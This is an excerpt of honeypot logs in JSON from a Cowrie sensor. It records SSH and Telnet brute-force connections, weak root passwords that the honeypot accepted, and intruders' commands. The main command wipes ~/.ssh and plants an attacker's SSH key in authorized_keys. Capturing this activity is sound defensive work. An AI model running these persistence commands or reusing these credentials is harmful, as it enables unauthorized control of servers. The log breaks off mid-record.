{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:10:25.036926Z","src_ip":"49.247.37.22","session":"f79c97ed7de5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:10:25.745284Z","src_ip":"49.247.37.22","session":"f79c97ed7de5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:10:25.745962Z","src_ip":"49.247.37.22","session":"f79c97ed7de5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:10:26.037040Z","src_ip":"49.247.37.22","session":"f79c97ed7de5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:10:26.037926Z","src_ip":"49.247.37.22","session":"f79c97ed7de5"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.37.22","src_port":11726,"dst_ip":"1.2.3.4","dst_port":22,"session":"85da34b2a22b","protocol":"ssh","message":"New connection: 49.247.37.22:11726 (1.2.3.4:22) [session: 85da34b2a22b]","sensor":"my-vps","timestamp":"2025-09-09T03:10:26.319785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:10:26.320606Z","src_ip":"49.247.37.22","session":"85da34b2a22b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:10:26.616233Z","src_ip":"49.247.37.22","session":"85da34b2a22b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:10:27.804349Z","src_ip":"49.247.37.22","session":"85da34b2a22b"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:10:29.096988Z","src_ip":"49.247.37.22","session":"85da34b2a22b"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.37.22","src_port":20889,"dst_ip":"1.2.3.4","dst_port":22,"session":"54fe4146c710","protocol":"ssh","message":"New connection: 49.247.37.22:20889 (1.2.3.4:22) [session: 54fe4146c710]","sensor":"my-vps","timestamp":"2025-09-09T03:10:29.379696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:10:29.380615Z","src_ip":"49.247.37.22","session":"54fe4146c710"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:10:29.676331Z","src_ip":"49.247.37.22","session":"54fe4146c710"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:10:30.862919Z","src_ip":"49.247.37.22","session":"54fe4146c710"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:10:31.157168Z","src_ip":"49.247.37.22","session":"f79c97ed7de5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:10:31.158022Z","src_ip":"49.247.37.22","session":"54fe4146c710"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.162","src_port":19821,"dst_ip":"1.2.3.4","dst_port":23,"session":"e4472613fb32","protocol":"telnet","message":"New connection: 194.165.16.162:19821 (1.2.3.4:23) [session: e4472613fb32]","sensor":"my-vps","timestamp":"2025-09-09T03:10:32.731755Z"}
{"eventid":"cowrie.session.closed","duration":0.0010573863983154297,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:10:32.732723Z","src_ip":"194.165.16.162","session":"e4472613fb32"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.162","src_port":20007,"dst_ip":"1.2.3.4","dst_port":23,"session":"c63585d1819f","protocol":"telnet","message":"New connection: 194.165.16.162:20007 (1.2.3.4:23) [session: c63585d1819f]","sensor":"my-vps","timestamp":"2025-09-09T03:10:32.746098Z"}
{"eventid":"cowrie.session.closed","duration":0.01532745361328125,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:10:32.761344Z","src_ip":"194.165.16.162","session":"c63585d1819f"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.162","src_port":20205,"dst_ip":"1.2.3.4","dst_port":23,"session":"eaba5d7eeab8","protocol":"telnet","message":"New connection: 194.165.16.162:20205 (1.2.3.4:23) [session: eaba5d7eeab8]","sensor":"my-vps","timestamp":"2025-09-09T03:10:32.775917Z"}
{"eventid":"cowrie.session.closed","duration":0.0161898136138916,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:10:32.792038Z","src_ip":"194.165.16.162","session":"eaba5d7eeab8"}
{"eventid":"cowrie.session.closed","duration":120.03777050971985,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:11:08.626481Z","src_ip":"212.227.125.160","session":"27817a98eb71"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:11:13.113614Z","src_ip":"212.227.125.160","session":"3bab5b4c504e"}
{"eventid":"cowrie.session.closed","duration":120.01072788238525,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:11:23.055382Z","src_ip":"212.227.125.160","session":"52357053c435"}
{"eventid":"cowrie.session.connect","src_ip":"194.135.46.28","src_port":49572,"dst_ip":"1.2.3.4","dst_port":22,"session":"8393f8f119ac","protocol":"ssh","message":"New connection: 194.135.46.28:49572 (1.2.3.4:22) [session: 8393f8f119ac]","sensor":"my-vps","timestamp":"2025-09-09T03:12:10.804750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:12:10.805981Z","src_ip":"194.135.46.28","session":"8393f8f119ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:12:10.824220Z","src_ip":"194.135.46.28","session":"8393f8f119ac"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:12:10.940924Z","src_ip":"194.135.46.28","session":"8393f8f119ac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:12:10.999341Z","src_ip":"194.135.46.28","session":"8393f8f119ac"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:12:11.000149Z","src_ip":"194.135.46.28","session":"8393f8f119ac"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:12:11.001350Z","src_ip":"194.135.46.28","session":"8393f8f119ac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:12:11.024881Z","src_ip":"194.135.46.28","session":"8393f8f119ac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:12:11.166861Z","src_ip":"194.135.46.28","session":"8393f8f119ac"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:12:11.167679Z","src_ip":"194.135.46.28","session":"8393f8f119ac"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:12:11.188043Z","src_ip":"194.135.46.28","session":"8393f8f119ac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:12:11.188949Z","src_ip":"194.135.46.28","session":"8393f8f119ac"}
{"eventid":"cowrie.session.connect","src_ip":"194.135.46.28","src_port":49578,"dst_ip":"1.2.3.4","dst_port":22,"session":"29dae6ab45ed","protocol":"ssh","message":"New connection: 194.135.46.28:49578 (1.2.3.4:22) [session: 29dae6ab45ed]","sensor":"my-vps","timestamp":"2025-09-09T03:12:11.205346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:12:11.206187Z","src_ip":"194.135.46.28","session":"29dae6ab45ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:12:11.223918Z","src_ip":"194.135.46.28","session":"29dae6ab45ed"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:12:11.337363Z","src_ip":"194.135.46.28","session":"29dae6ab45ed"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:12:12.357529Z","src_ip":"194.135.46.28","session":"29dae6ab45ed"}
{"eventid":"cowrie.session.connect","src_ip":"194.135.46.28","src_port":49586,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bfa64950b7e","protocol":"ssh","message":"New connection: 194.135.46.28:49586 (1.2.3.4:22) [session: 1bfa64950b7e]","sensor":"my-vps","timestamp":"2025-09-09T03:12:12.374854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:12:12.375933Z","src_ip":"194.135.46.28","session":"1bfa64950b7e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:12:12.394135Z","src_ip":"194.135.46.28","session":"1bfa64950b7e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:12:12.505945Z","src_ip":"194.135.46.28","session":"1bfa64950b7e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:12:12.525436Z","src_ip":"194.135.46.28","session":"8393f8f119ac"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:12:12.526461Z","src_ip":"194.135.46.28","session":"1bfa64950b7e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61376,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c424734eb0a","protocol":"ssh","message":"New connection: 217.72.205.35:61376 (1.2.3.4:22) [session: 5c424734eb0a]","sensor":"my-vps","timestamp":"2025-09-09T03:13:27.161789Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:13:27.163006Z","src_ip":"217.72.205.35","session":"5c424734eb0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62902,"dst_ip":"1.2.3.4","dst_port":23,"session":"2d622f1f722d","protocol":"telnet","message":"New connection: 212.227.235.229:62902 (1.2.3.4:23) [session: 2d622f1f722d]","sensor":"my-vps","timestamp":"2025-09-09T03:13:58.167161Z"}
{"eventid":"cowrie.session.closed","duration":9.833546876907349,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:14:08.000644Z","src_ip":"212.227.235.229","session":"2d622f1f722d"}
{"eventid":"cowrie.session.closed","duration":"301.1","message":"Connection lost after 301.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:15:22.722006Z","src_ip":"106.37.72.234","session":"2b5558de70d7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55196,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf82d530d8f4","protocol":"ssh","message":"New connection: 217.72.205.35:55196 (1.2.3.4:22) [session: bf82d530d8f4]","sensor":"my-vps","timestamp":"2025-09-09T03:20:03.557377Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:20:03.558450Z","src_ip":"217.72.205.35","session":"bf82d530d8f4"}
{"eventid":"cowrie.session.connect","src_ip":"116.196.70.63","src_port":46756,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba2c87b049f9","protocol":"ssh","message":"New connection: 116.196.70.63:46756 (1.2.3.4:22) [session: ba2c87b049f9]","sensor":"my-vps","timestamp":"2025-09-09T03:21:03.811070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T03:21:04.742922Z","src_ip":"116.196.70.63","session":"ba2c87b049f9"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 